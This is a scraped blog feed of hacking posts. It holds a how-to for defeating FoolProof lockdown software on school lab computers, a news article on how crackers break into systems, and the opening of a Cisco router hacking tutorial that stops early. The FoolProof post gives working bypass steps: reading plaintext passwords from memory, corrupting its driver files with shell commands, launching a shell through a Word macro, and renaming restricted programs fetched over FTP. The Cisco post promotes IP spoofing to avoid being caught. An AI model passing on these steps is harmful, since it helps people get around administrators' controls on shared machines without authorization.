I pretty much just cut &lt;br /&gt;it down to the main points.  Most of the stuff here pertains to &lt;br /&gt;Windows 3.x versions.  Take a look and see if you see anything &lt;br /&gt;handy. &lt;br /&gt;_____________________________________________________________________ &lt;br /&gt;&lt;br /&gt;All my information pertains directly to &lt;br /&gt;versions 3.0 and 3.3 of both the 3.x and &lt;br /&gt;95 versions but should be good for all &lt;br /&gt;early versions if they exist. &lt;br /&gt;&lt;br /&gt;My first success with breaking FoolProof passwords came by using &lt;br /&gt;a hex editor to scan the Windows swap file for anything that might be &lt;br /&gt;of &lt;br /&gt;interest.  In the swap file I found the password in plain text.  I was &lt;br /&gt;surprised but thought that it was something that would be simply &lt;br /&gt;unavoidable and unpredictable.  Later though I used a memory editor on &lt;br /&gt;the machine (95 loves it when I do that) and found that FoolProof &lt;br /&gt;stores &lt;br /&gt;a copy of the user password IN PLAIN TEXT inside its TSR's memory &lt;br /&gt;space. &lt;br /&gt;&lt;br /&gt;To find a FoolProof password, simply search through conventional &lt;br /&gt;memory for the string "FOOLPROO" (I don't know what they did with that &lt;br /&gt;last "F") and the next 128 bytes or so should contain two plaintext &lt;br /&gt;passwords followed by the hot-key assignment.  For some reason &lt;br /&gt;FoolProof &lt;br /&gt;keeps two passwords on the machine, the present one and a 'legacy' &lt;br /&gt;password (the one you used before you _thought_ it was changed). &lt;br /&gt;There &lt;br /&gt;exist a few memory viewers/editors but it isn't much effort to write &lt;br /&gt;something. &lt;br /&gt;&lt;br /&gt;Getting to a point where you can execute something can be &lt;br /&gt;difficult but isn't impossible.  
I found that it is more difficult to &lt;br /&gt;do &lt;br /&gt;this on the win3.x machines because FoolProof isn't compromised by the &lt;br /&gt;operating system it sits on top of; basically getting a DOS prompt is up &lt;br /&gt;to &lt;br /&gt;you (try file manager if you can).  95 is easier because it is very &lt;br /&gt;simple to convince 95 that it should start up into Safe-Mode, then &lt;br /&gt;create a shortcut in the StartUp group to your editor and &lt;br /&gt;reboot the machine (FoolProof doesn't get a chance to load in safe &lt;br /&gt;mode). &lt;br /&gt;&lt;br /&gt;JohnWayne &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;MISC Method 1 &lt;br /&gt;/////////////// &lt;br /&gt;&lt;br /&gt;1. Launch a process viewing application (for example, Microsoft's &lt;br /&gt;pviewer) and kill &lt;br /&gt;FoolProof's running VXDs. Foolproof will now be disabled (although it &lt;br /&gt;will be loaded again on &lt;br /&gt;the next boot) &lt;br /&gt;&lt;br /&gt;My comments: &lt;br /&gt;Haven't tried it.  Again, the machines I have been on have had the &lt;br /&gt;security as &lt;br /&gt;tight as possible.  I don't see running a process viewing application &lt;br /&gt;as a &lt;br /&gt;plausible option.  But go for it if you want. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2. To uninstall Foolproof, move all the files from the FoolProof &lt;br /&gt;directory (which is '\sss' by &lt;br /&gt;default) to a temporary directory. Be sure to move all the files &lt;br /&gt;except the two .VXD files. On &lt;br /&gt;the next boot only the VXDs will be loaded, but Foolproof will be &lt;br /&gt;disabled (since the other &lt;br /&gt;necessary files will not be in FoolProof's directory). Now move the &lt;br /&gt;FoolProof files back to &lt;br /&gt;their original directory, and run Unfool.exe (which is usually located &lt;br /&gt;in the Windows directory). &lt;br /&gt;&lt;br /&gt;My comments: &lt;br /&gt;Haven't tried this either.  
Moving files has always been restricted &lt;br /&gt;for me too. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3. The standard version of FoolProof does not block network file &lt;br /&gt;access. So if you have a &lt;br /&gt;network (as most schools do) then depending on the configuration of &lt;br /&gt;your &lt;br /&gt;account and the network itself, there are ways around certain aspects &lt;br /&gt;of FoolProof. &lt;br /&gt;For example, if you are using NetWare (4.11 is what this has been &lt;br /&gt;tested on) and NAL to &lt;br /&gt;manage access to network applications, there is a convenient way to &lt;br /&gt;get to browse drives that &lt;br /&gt;may be blocked, and to get to the explorer options menu (file types, &lt;br /&gt;view hidden files, etc..). &lt;br /&gt;Open your Server Apps folder (or Applications, or whatever your &lt;br /&gt;version of NAL calls it, it is &lt;br /&gt;the folder that is created on the desktop by NAL to provide access to &lt;br /&gt;NAL applications). &lt;br /&gt;Since the Server Apps folder is actually part of NAL, and therefore &lt;br /&gt;considered a network &lt;br /&gt;entity, FoolProof won't even attempt to block it. Once it is open, you &lt;br /&gt;can view the explorer &lt;br /&gt;toolbar, or options menu and browse from there. That is assuming, of &lt;br /&gt;course, that they have &lt;br /&gt;been blocked on your system. &lt;br /&gt;&lt;br /&gt;My comments: &lt;br /&gt;The systems I cracked had blocked network access. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;4. Rename the executable you wish to run to a .SCR extension. FoolProof &lt;br /&gt;does not block &lt;br /&gt;screen savers, so the executable can now be launched, masquerading as &lt;br /&gt;a screen saver. &lt;br /&gt;&lt;br /&gt;My comments: &lt;br /&gt;This sounds like it might be plausible.  I will try it in the future, &lt;br /&gt;but &lt;br /&gt;as it stands now, I have not tested this. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;5. 
Run the executable from a network drive &lt;br /&gt;&lt;br /&gt;My comments: &lt;br /&gt;I couldn't. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;6. Run Word, and open a shell session using the macro Shell &lt;br /&gt;Environ$("COMMAND"). &lt;br /&gt;&lt;br /&gt;My comments: &lt;br /&gt;Sounds money.  Haven't tried it. &lt;br /&gt;&lt;br /&gt;7. If the workstation is a Novell client, it's possible to hit 'F1' &lt;br /&gt;from the login screen, and when &lt;br /&gt;the help screen comes up, select the 'file' menu and then 'open'. Now &lt;br /&gt;you can browse the local &lt;br /&gt;drives, and rename FoolProof's directory. &lt;br /&gt;&lt;br /&gt;My comments: &lt;br /&gt;I didn't work under a Novell client, but I am interested to know if this &lt;br /&gt;is &lt;br /&gt;legit. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;8. If a Virus Scanning utility is installed, right-click on a folder &lt;br /&gt;and select 'Scan for Viruses'. &lt;br /&gt;Now select the 'log' option, and change the location of the log file. &lt;br /&gt;Now you can browse &lt;br /&gt;around the local drive, again being able to rename the FoolProof &lt;br /&gt;folder. &lt;br /&gt;&lt;br /&gt;My comments: &lt;br /&gt;This is actually a really good way to go if possible.  I tried it on a &lt;br /&gt;computer &lt;br /&gt;that was running McAfee.  I went into the log option and then selected &lt;br /&gt;the "browse" &lt;br /&gt;option to decide where to place the log text.  You can then see things &lt;br /&gt;previously &lt;br /&gt;hidden by Foolproof.  By hitting F2 while an object is selected, you &lt;br /&gt;can rename it. &lt;br /&gt;So go ahead and try to rename the Foolproof directory or files.  My &lt;br /&gt;hotkeys (F2) were &lt;br /&gt;disabled, but yours may not be. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;9. 
In any application that has a standard file choosing dialog &lt;br /&gt;(usually under the 'file', 'open' &lt;br /&gt;menu), browse to the directory containing the desired application &lt;br /&gt;(good examples are &lt;br /&gt;c:\windows\explorer.exe or c:\command.com), right click the .exe and &lt;br /&gt;choose "Quick View". &lt;br /&gt;The program's icon appears in the upper left-hand corner of the window &lt;br /&gt;- click it and voila! &lt;br /&gt;Your application is running. &lt;br /&gt;&lt;br /&gt;My comments: &lt;br /&gt;On the machines I cracked, the C: directory was shadowed, therefore &lt;br /&gt;when I went into a program's &lt;br /&gt;"open" command, opening something from C: was not an option. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;10. Start a DOS session (by running command.com), and trash the &lt;br /&gt;foolproof VXD file by &lt;br /&gt;typing: echo hi&gt; c:\fp95\fpvxd.vxd &lt;br /&gt;Restart Windows, and a screen will appear saying that &lt;br /&gt;c:\fp95\fpvxd.vxd is corrupt. Hit &lt;br /&gt;CTRL+ALT+DELETE and when Windows loads you will be able to choose &lt;br /&gt;which mode &lt;br /&gt;to boot from. Select 'safe mode' and you'll be able to uninstall &lt;br /&gt;foolproof (or simply delete the &lt;br /&gt;entire foolproof directory). Alternatively, when in safe mode, just &lt;br /&gt;start a DOS session and &lt;br /&gt;type: echo hi&gt; c:\fp95\fplw16.exe. Now you can restart your computer: &lt;br /&gt;Foolproof will be &lt;br /&gt;disabled. &lt;br /&gt;&lt;br /&gt;My comments: &lt;br /&gt;I couldn't run command.com, or open in safe mode.  This might prove &lt;br /&gt;difficult. &lt;br /&gt;Also note that this appears to apply to an early version of Foolproof. &lt;br /&gt;I say this &lt;br /&gt;because in later versions the Foolproof directory is C:\Sss, not &lt;br /&gt;C:\fp95. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;11. 
Run: c:\Windows\System\msconfig.exe or click on: Start -&gt; Run -&gt; &lt;br /&gt;msconfig &lt;br /&gt;Now go to the Startup tab, and uncheck everything that says &lt;br /&gt;"FoolProof". Restart, and &lt;br /&gt;foolproof will be disabled. &lt;br /&gt;&lt;br /&gt;My comments: &lt;br /&gt;Sounds old to me (at least the versions of Foolproof on which this would &lt;br /&gt;work). My "Run" &lt;br /&gt;option was gone, and I couldn't run unauthorized .exe's. &lt;br /&gt;&lt;br /&gt;12. Reboot with a Win98 boot disk and select the second option (Start &lt;br /&gt;without CD-ROM &lt;br /&gt;support), type the command "rename c:\sss\foolstr.exe nfoolstr.exe" &lt;br /&gt;where c:\sss is &lt;br /&gt;FoolProof's directory, remove the boot disk and restart. FoolProof should &lt;br /&gt;not start and you may &lt;br /&gt;get an error message. Click start --&gt; find, and type nfoolstr.exe. &lt;br /&gt;Rename it to "foolstr.exe". &lt;br /&gt;Find the file unfool.exe and run it. Now do whatever you want! &lt;br /&gt;&lt;br /&gt;My comments: &lt;br /&gt;I haven't tried this exact method, but I have always found that the &lt;br /&gt;first half (using a boot &lt;br /&gt;disk) is the best way to get started.  From my experience this looks &lt;br /&gt;to be an ideal method &lt;br /&gt;as long as you have access to the Foolproof directory (C:\Sss) from &lt;br /&gt;DOS. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;MISC Method 2 &lt;br /&gt;/////////////// &lt;br /&gt;&lt;br /&gt;FoolProof Security is a desktop security application for Windows &lt;br /&gt;95/98/ME. Its purpose is to block users from accessing all programs &lt;br /&gt;except those intended by the administrator. Additionally, it &lt;br /&gt;is &lt;br /&gt;intended to allow the user to save files only to specific locations &lt;br /&gt;(usually the floppy disk drive). FoolProof Security is usually found &lt;br /&gt;in &lt;br /&gt;computer labs, or on publicly accessible systems. 
&lt;br /&gt;&lt;br /&gt;A vulnerability exists in FoolProof Security, in that it restricts &lt;br /&gt;certain programs from being executed by matching them only by name. By renaming a restricted &lt;br /&gt;program, it can be successfully executed. This vulnerability can be &lt;br /&gt;used to &lt;br /&gt;successfully circumvent the security measures put forth by FoolProof, &lt;br /&gt;and &lt;br /&gt;even remove it entirely from the system. &lt;br /&gt;&lt;br /&gt;The following is an example: &lt;br /&gt;&lt;br /&gt;On a system with FoolProof Security installed, open an MS-DOS Shell &lt;br /&gt;(usually found in Start Menu -&gt; Programs -&gt; Accessories). &lt;br /&gt;['COMMAND.EXE' &lt;br /&gt;is not restricted by FoolProof.] At the command prompt issue the 'ftp' &lt;br /&gt;command and open a connection to an ftp server to which you have write &lt;br /&gt;access. ['FTP.EXE' is not restricted by FoolProof.] Upload the &lt;br /&gt;restricted program which you wish to run. [such as 'deltree', &lt;br /&gt;'xcopy', 'edit', 'fdisk', and 'format'.] Afterwards, download these &lt;br /&gt;programs under a different name. [Use names other than those of &lt;br /&gt;restricted &lt;br /&gt;programs. Names such as 'tmp001a.exe' work.] You will now be able to &lt;br /&gt;use &lt;br /&gt;these programs, just as if they were the restricted equivalent. &lt;br /&gt;&lt;br /&gt;Side Note: Although you can use this process to run 'regedit', the &lt;br /&gt;registry is still locked by FoolProof. &lt;br /&gt;&lt;br /&gt;Solution: &lt;br /&gt;&lt;br /&gt;A quick fix would be the removal of the 'ftp' client (although it &lt;br /&gt;will &lt;br /&gt;still be possible to download a simple ftp client that will do the &lt;br /&gt;same &lt;br /&gt;job.) 
&lt;br /&gt;&lt;br /&gt;Additionally, any shortcuts to 'command' should be removed, as this &lt;br /&gt;method &lt;br /&gt;will not work without it.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-887841099624198515?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/887841099624198515/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=887841099624198515' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/887841099624198515'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/887841099624198515'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2007/12/various-ways-to-hack-or-over-ride.html' title='Various ways to hack or over-ride'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-8129566703271993975</id><published>2007-12-02T01:22:00.002-08:00</published><updated>2007-12-02T01:23:41.129-08:00</updated><title type='text'>How cracker's crack</title><content type='html'>Mercury News Computing Editor                                 &lt;br /&gt;                                                                                &lt;br /&gt;     Police, prosecutors and most of the press call them                        &lt;br /&gt;"hackers." Computer cognoscenti prefer the term "crackers."           
&lt;br /&gt;&lt;br /&gt;Both sides are talking about the same people, typically young men, whose fascination with computers leads them to gain access to computers where they don't belong. &lt;br /&gt;&lt;br /&gt;A few crackers make headlines, like Robert T. Morris Jr., son of a top computer security expert for the supersecret National Security Agency, who let loose a "worm" program on a national network of university, research and government computers in 1988. &lt;br /&gt;&lt;br /&gt;There are also notorious crackers like Kevin Mitnick, who was under investigation at the age of 13 for illegally obtaining free long-distance phone calls and was sentenced to prison in 1989 for computer break-ins. &lt;br /&gt;&lt;br /&gt;Then there are legions of far more ordinary crackers who simply use their knowledge of computers to "explore" intriguing corporate or government computers or simply to go for the electronic equivalent of a joy ride and impress their friends. 
&lt;br /&gt;&lt;br /&gt;But they all share something: an air of mystery. How do they do it?&lt;br /&gt;&lt;br /&gt;At a recent conference on computer freedom and privacy, computer expert Russell L. Brand gave a four-hour lecture on the inner workings of computer cracking.&lt;br /&gt;&lt;br /&gt;His basic message: Cracking is not as hard as it seems to an outsider, and it often goes undetected by legitimate users of "cracked" computers.&lt;br /&gt;&lt;br /&gt;"Just because you don't see a problem is no reason to think a problem hasn't occurred," Brand said. "Generally it's a month to six weeks before (operators) notice anything happened and usually because the cracker accidentally broke something."&lt;br /&gt;&lt;br /&gt;Home computers aren't in danger from crackers because they aren't accessible to outsiders--and because they aren't interesting to crackers. Instead, they target mainframes and minicomputers that support many users and are connected to telephone lines and large networks.
&lt;br /&gt;&lt;br /&gt;Understanding how crackers work and what security weaknesses they exploit can help system managers prevent many break-ins, Brand said. And the biggest problem is carelessness.&lt;br /&gt;&lt;br /&gt;"When I started looking at break-ins, I had the assumption that technical problems were at fault," he said. "But the problem is human beings."&lt;br /&gt;&lt;br /&gt;The "Cracker": Most crackers are not bent on stealing either money or secrets but will target a particular computer for entry because of the bragging rights they will enjoy with fellow crackers once they prove they broke in. Typically, the computer belongs to a corporation or the government and is considered in cracking circles to be hard to penetrate. Often, it is connected to the nationwide NSFNet computer network.&lt;br /&gt;&lt;br /&gt;The attack: Crackers can attack the target computer from home, using a modem and a telephone line. Or they can visit a publicly accessible terminal room, like one on a college campus, using the school's computer to attack the target through a network.
At home, the cracker works undisturbed and unseen for hours, but phone calls might be traced.&lt;br /&gt;&lt;br /&gt;The resources: If the target computer is nearby, the cracker may look through the owner's trash for valuable information, a practice called "dumpster diving." Discarded printouts, manuals or other paper may contain lists of accounts, some passwords, or technical data more sophisticated crackers can exploit.&lt;br /&gt;&lt;br /&gt;The target: The easiest way to enter the target is with an account name and its password. Passwords are often the weakest link in a computer's security system: Many are easy to guess, and some accounts have no password at all. Sophisticated crackers use their personal computers to quickly try thousands of potential passwords for a match.&lt;br /&gt;&lt;br /&gt;The cover: To make calls from home harder to trace, crackers might use stolen telephone credit-card numbers to place a series of calls through different long-distance carriers or corporate switchboards before calling the target computer's modem.
&lt;br /&gt;&lt;br /&gt;The way in: Many crackers take advantage of "holes" in the operating system, the software that controls the basic operations of the machine. The holes are like secret doors that either let crackers make their own "super" accounts or just bypass accounts and passwords altogether. Five holes in the Unix operating system account for the bulk of computer break-ins--yet many installations have failed to patch them.&lt;br /&gt;&lt;br /&gt;The network: Most large computers are connected to several others through networks, a chief point of attack. Computers erect barriers to people but often completely trust other computers, so attacking a computer through another computer on the network can be easier than attacking it with a personal computer and a modem.&lt;br /&gt;&lt;br /&gt;Ill-used passwords let many pass&lt;br /&gt;&lt;br /&gt;Passwords are the security linchpin for most computer systems. But these supposedly secret keys to computer access are easily obtained by a determined cracker.
&lt;br /&gt;&lt;br /&gt;The main reason: Users and system managers often are so careless with passwords that they are as easy to find as a door key left under the welcome mat.&lt;br /&gt;&lt;br /&gt;Part of the problem is the proliferation of computers and computerlike devices such as automated teller machines, all of which require passwords or personal identification numbers. Many people must now remember half a dozen or more such secret codes, encouraging them to make each one short and simple.&lt;br /&gt;&lt;br /&gt;Often, that means making their passwords the same as their account name, which in turn is often the user's own first or last name. Such identical combinations are called "Joe" accounts, and according to computer expert Russell L. Brand, they are "the single most common cause of password problems in the world."
&lt;br /&gt;&lt;br /&gt;Knowing there are Joes, a cracker can simply try a few dozen common English names with a reasonable chance that one will work. Armed with an easily obtained company directory of employees, the task can be even easier.&lt;br /&gt;&lt;br /&gt;Joe accounts also crop up when the system manager creates an account for a new employee, expecting that the user will immediately change the given password from his or her name to something else. But users often fail to make the change or aren't told how. Sometimes, they never use the account at all, providing not only easy access for the cracker but an account where the owner won't notice any illicit activity.&lt;br /&gt;&lt;br /&gt;Even if crackers can't find a "Joe" on the computer they want to enter, there are several other common ways for them to find a password that will work:&lt;br /&gt;&lt;br /&gt;- Many systems have accounts with no passwords or have accounts for occasional visitors to use where the ID and password are both GUEST.
&lt;br /&gt;&lt;br /&gt;- Outdated operator's manuals retrieved from the trash often list the account name and standard password provided by the operating system for use by maintenance programmers. Although it can and should be changed, the password seldom is.&lt;br /&gt;&lt;br /&gt;- "Social engineering"--in effect, persuading someone, usually by telephone, to divulge account names, passwords or both--is a common ploy used by crackers.&lt;br /&gt;&lt;br /&gt;- Crackers are sometimes able to obtain an encrypted list of passwords for a target computer, discarded by the owners who mistakenly believe the coded words aren't useful to crackers. While it's true they are difficult to decode, it is easy for a cracker to use a personal computer to take a potential password and encode it. Because most passwords are ordinary English words, crackers can simply run a personal computer program to encode the contents of an electronic dictionary and identify any entries that match passwords on the coded list.
&lt;br /&gt;&lt;br /&gt;- In another form of deception, crackers set up public bulletin board systems whose real purpose is to snag passwords. Because many people tend to use the same password for all their computer accounts, the cracker can simply wait until someone who has an account on the target computer also sets up an account on the bulletin board. The cracker then reads the password and tries it on the target system.&lt;br /&gt;&lt;br /&gt;While individual users can't delete dormant accounts from their computers or keep an eye on the trash, they can be intelligent about what passwords they use. Brand suggests users choose a short phrase that's easy for them to remember and then use the first two letters of each word as the password. As added protection, users who are able should mix uppercase and lowercase letters in their passwords or use a punctuation mark in the middle of the word.--Rory J. O'Connor&lt;br /&gt;&lt;br /&gt;The rights of bits&lt;br /&gt;&lt;br /&gt;Constitutional scholar Laurence H.
Tribe, widely considered the first choice for any Supreme Court vacancy that might arise under a Democratic administration, proposed a fairly radical idea recently: a constitutional amendment covering computers.&lt;br /&gt;&lt;br /&gt;Tribe's proposal for a 27th Amendment would specifically extend First and Fourth Amendment protections to the rapidly growing and increasingly pervasive universe of computing. Those rights would be "construed as fully applicable without regard to the technological method or medium through which information content is generated, stored, altered, transmitted or controlled," in the words of the proposed amendment.&lt;br /&gt;&lt;br /&gt;I am not a constitutional scholar, but I have to believe that what's needed is not a change in the Constitution, but instead a change in the thinking of judges in particular and the public in general.&lt;br /&gt;&lt;br /&gt;Tribe acknowledges that he doesn't take amendments lightly, pointing to the ridiculous brouhaha over a flag-burning amendment as an example of what not to do to the basic law of the land.
But like many people who are more deeply involved in the world of computers, Tribe sees the issue of civil liberties in an information society as a crucial one.&lt;br /&gt;&lt;br /&gt;The question is not whether the civil liberties issue is serious enough to be addressed by some fundamental legal change. The question is really how to get people to see that communicating with a computer is speech, and that to search a computer and seize data is the same as searching a house and seizing the contents of my filing cabinet.&lt;br /&gt;&lt;br /&gt;People seem to have trouble making these connections when computers are involved, even though they wouldn't have trouble recognizing a private telephone conversation as protected speech. Yet most telephone calls in this country are, at some time in their transmission, nothing more than a stream of computer bits traveling between sophisticated computers.&lt;br /&gt;&lt;br /&gt;Admittedly, computers do make for some complications where things like search and seizure are concerned.
&lt;br /&gt;&lt;br /&gt;Let's say the FBI gets a search warrant for a computer bulletin board, looking for a specific set of messages about an illegal drug business. Because a single hard disk drive on a bulletin board system can contain thousands of messages from different users, the normal method for police will be to take the whole disk, and probably the computer as well, back to the lab to look for the suspect messages.&lt;br /&gt;&lt;br /&gt;Of course, that exposes other, supposedly confidential messages to police scrutiny. It also interrupts the legitimate operation of what is, in effect, an electronic printing press.&lt;br /&gt;&lt;br /&gt;Certainly, in the case of a real printing press that used paper, such police activity would never be allowed. But a computer is involved here, which to some appears to make the existing rules inapplicable.&lt;br /&gt;&lt;br /&gt;But in a case like this, we don't need a new amendment, just the proper application of the Bill of Rights.
&lt;br /&gt;&lt;br /&gt;As a more practical matter, the chances of amending the Constitution are slight. It was the intent of the framers to make the task difficult, to prevent just such trivial things as flag-burning amendments from being tacked onto the document. Even the far more substantial Equal Rights Amendment did not survive the rocky road from proposal to adoption. I doubt Tribe's</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/8129566703271993975/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=8129566703271993975' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/8129566703271993975'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/8129566703271993975'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2007/12/how-crackers-crack.html' title='How crackers crack'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-819619244289531499</id><published>2007-12-02T01:22:00.001-08:00</published><updated>2007-12-02T01:22:36.200-08:00</updated><title type='text'>Exploiting cisco systems</title><content type='html'>Warning:&lt;br /&gt;DO NOT use this to damage cisco systems, or gain unauthorized access to systems. This tutorial is just something to use for educational purposes. Only use this information in a legal way (the hacker wargames for instance), and do not damage or destroy anything. This is a step-by-step guide on how a series of proven cisco exploits can be used to gain access. If you get caught breaking into a cisco router, or screw the system up, you can interrupt hundreds of internet clients, and cost thousands of dollars, so only use this when you are allowed!! Using this the wrong way will get you into a lot of trouble.&lt;br /&gt;&lt;br /&gt;Note: some of this tutorial was written on a Unix system, and the text was not converted to be DOS/Windows-compatible, so you'll have to view this text from either your Internet browser, or from an advanced editor such as Microsoft Word.&lt;br /&gt;&lt;br /&gt;----------------------------------&lt;br /&gt;Table of Contents:&lt;br /&gt;----------------------------------&lt;br /&gt;Before you start:&lt;br /&gt;&lt;br /&gt;- What is an IP address?&lt;br /&gt;&lt;br /&gt;- What is an ISP?&lt;br /&gt;&lt;br /&gt;- What is a TCP/IP packet?&lt;br /&gt;&lt;br /&gt;- How to spoof your IP&lt;br /&gt;&lt;br /&gt;- How to use Telnet&lt;br /&gt;&lt;br /&gt;- How to use HyperTerminal&lt;br /&gt;&lt;br /&gt;- How to use Ping&lt;br /&gt;&lt;br /&gt;- How to use TraceRoute&lt;br /&gt;&lt;br /&gt;- How to use a proxy server&lt;br /&gt;&lt;br /&gt;-------------------------------------&lt;br /&gt;&lt;br /&gt;- Section 1:
why hack a cisco router?&lt;br /&gt;&lt;br /&gt;- Section 2: how to find a cisco router&lt;br /&gt;&lt;br /&gt;- Section 3: how to break into a cisco&lt;br /&gt;&lt;br /&gt;- Section 4: how to break the password&lt;br /&gt;&lt;br /&gt;- Section 5: how to use a cisco router&lt;br /&gt;&lt;br /&gt;-----------------------------------&lt;br /&gt;&lt;br /&gt;Stuff you'll need to know BEFORE you start:&lt;br /&gt;&lt;br /&gt;-----------------------------------&lt;br /&gt;&lt;br /&gt;What is an IP address?&lt;br /&gt;&lt;br /&gt;IP stands for Internet Protocol. IP addresses are used by other computers to identify computers that connect to them. This is how you can be banned from IRC, and how they can find your ISP. IP addresses are easily obtained; they can be retrieved through the following methods:&lt;br /&gt;&lt;br /&gt;- you go to a website, your IP is logged&lt;br /&gt;&lt;br /&gt;- on IRC, anyone can get your IP&lt;br /&gt;&lt;br /&gt;- on ICQ, people can get your IP; even if you have the option "do not show ip" set, they can still get it&lt;br /&gt;&lt;br /&gt;- if you are connected to someone, they can type "systat", and see who is connected to them&lt;br /&gt;&lt;br /&gt;- if someone sends you an email with IP-logging java, they can also get your IP address&lt;br /&gt;&lt;br /&gt;There are many more ways of obtaining IP addresses, including using back-door programs such as Sub7 or NetBus.&lt;br /&gt;&lt;br /&gt;------------------------------------&lt;br /&gt;&lt;br /&gt;What is an ISP?&lt;br /&gt;&lt;br /&gt;ISP stands for Internet Service Provider; they are the ones that give you the internet. You connect to one every time you dial up and make a connection. People can find your ISP simply by running a traceroute on you (traceroute is later explained).
It will look something like this:&lt;br /&gt;&lt;br /&gt;tracert 222.222.22.22&lt;br /&gt;&lt;br /&gt;Tracing route to [221.223.24.54]&lt;br /&gt;over a maximum of 30 hops.&lt;br /&gt;1 147ms 122ms 132ms your.isp [222.222.22.21]&lt;br /&gt;2 122ms 143ms 123ms isp.firewall [222.222.22.20]&lt;br /&gt;3 156ms 142MS 122ms aol.com [207.22.44.33]&lt;br /&gt;4 * * * Request timed out&lt;br /&gt;5 101ms 102ms 133ms cisco.router [194.33.44.33]&lt;br /&gt;6 233ms 143ms 102ms something.ip [111.11.11.11]&lt;br /&gt;7 222ms 123ms 213ms netcom.com [122.11.21.21]&lt;br /&gt;8 152ms 211ms 212ms blahblah.tts.net [121.21.21.33]&lt;br /&gt;9 122ms 223ms 243ms altavista.34.com [121.22.32.43] &lt;&lt;&lt; target's isp&lt;br /&gt;10 101ms 122ms 132ms 221.223.24.54.altavista.34.com [221.223.24.54] &lt;br /&gt;Trace complete.&lt;br /&gt;&lt;br /&gt;-----------------------------------&lt;br /&gt;&lt;br /&gt;What is a TCP/IP packet?&lt;br /&gt;&lt;br /&gt;TCP/IP stands for Transmission Control Protocol and Internet Protocol; a TCP/IP packet is a block of data which is compressed, then a header is put on it and it is sent to another computer. This is how ALL internet transfers occur, by sending packets. The header in a packet contains the IP address of the one who originally sent the packet. You can re-write a packet and make it seem like it came from anyone!! You can use this to gain access to lots of systems and you will not get caught. You will need to be running Linux or have a program which will let you do this. This tutorial does not tell you to use this on a Cisco router, but it does come in handy when hacking any system. If something goes wrong when you try to hack a system, you can always try this...&lt;br /&gt;&lt;br /&gt;------------------------------------&lt;br /&gt;&lt;br /&gt;How to spoof your IP:&lt;br /&gt;&lt;br /&gt;Find a program like Genius 2 or DC IS, which will let you run IdentD.
This will let you change part of your computer's identity at will! Use this when you get banned from some IRC chat room.... you can get right back in! You can also use it when you are accessing another system, so it logs the wrong id...&lt;br /&gt;&lt;br /&gt;------------------------------------&lt;br /&gt;&lt;br /&gt;How to use telnet:&lt;br /&gt;&lt;br /&gt;You can open telnet simply by going to your Start Menu, then to Run, and typing in "telnet".&lt;br /&gt;&lt;br /&gt;Once you have opened telnet, you may want to change some features. Click on Terminal&gt;Preferences. Here you can change the buffer size, font, and other things. You can also turn "local echo" on or off; if you turn local echo on, your computer will show you everything you type, and the other computer you are connected to will show you as well. So you may get something like this:&lt;br /&gt;&lt;br /&gt;You type "hello", and you get&lt;br /&gt;hhelelollo&lt;br /&gt;&lt;br /&gt;This is because the information has bounced back and got scrambled with what you typed. The only reason I would use this is if the machine does NOT return what you are typing.&lt;br /&gt;&lt;br /&gt;By default, telnet will connect to a system on the telnet port, which is port 23. Now you will not always want to connect to port 23, so when you go to connect, you can change the port to maybe 25, which is the port for mail servers. Or maybe port 21, for FTP. There are thousands of ports, so make sure you pick the right one!&lt;br /&gt;&lt;br /&gt;----------------------------------&lt;br /&gt;&lt;br /&gt;How to use HyperTerminal:&lt;br /&gt;&lt;br /&gt;HyperTerminal allows you to open a "server" on any port of your computer to listen for incoming information from specified computers. To use this, go to Start&gt;Programs&gt;Accessories&gt;Communications&gt;HyperTerminal.
